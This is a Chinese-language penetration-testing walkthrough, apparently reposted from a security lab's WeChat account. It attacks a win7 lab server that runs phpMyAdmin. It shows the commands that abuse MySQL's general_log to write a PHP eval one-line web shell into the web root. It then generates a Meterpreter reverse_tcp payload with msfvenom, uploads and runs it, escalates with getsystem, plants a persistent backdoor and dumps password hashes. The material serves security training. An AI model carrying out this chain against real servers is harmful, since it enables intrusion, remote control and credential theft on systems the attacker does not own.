靶机:win7 32 位。
环境:
php:5.45
MYsql:5.5.53
Apache:2.4s
访问目标站点,发现开启3306 端口,
经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root
general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
general log file 指的是日志的保存路径。
SHOW VARIABLES LIKE 'general%'
已知general_log默认是关闭的,log日志存放的位置是C:\php\MySQL\data\SC-201805120002.log
开启generallog 的作用,开启它可以记录用户输入的每条命令,会把其保存在C:\php\MySQL\data\SC-201805120002.log下的一个log文件中,其实就是我们常说的日志文件。利用的思路是开启generallog之后把generallogfile的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。
set global general_log = "ON";
SET global general_log_file='C:/php/WWW/testshell.php';
在网站的根路径下生成了testshell.php的文件夹。
select '<?php eval($_POST[cmd]);?>';
发现现在获取的权限为administrator权限,通过msf下getsystem来进行提权。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 -f exe >testshell.exe
将生成的木马通过蚁剑上传到目标服务器并执行。
使用getsystem来进行提权。
生成的后门文件路径:
后门加载成功
利用方式:
当用户登录到远程系统时,为我们打开一个Meterpreter会话
成功。
1.在获取密码的过程中由于是本地搭建的,所以是知道密码的在实际使用中可以采用爆破的方式获取密码。
2.在获取一句话反弹连接后尝试获取密码失败,后面在msf下获取hash成功获取目标登录密码。
本文分享自 Ms08067安全实验室 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!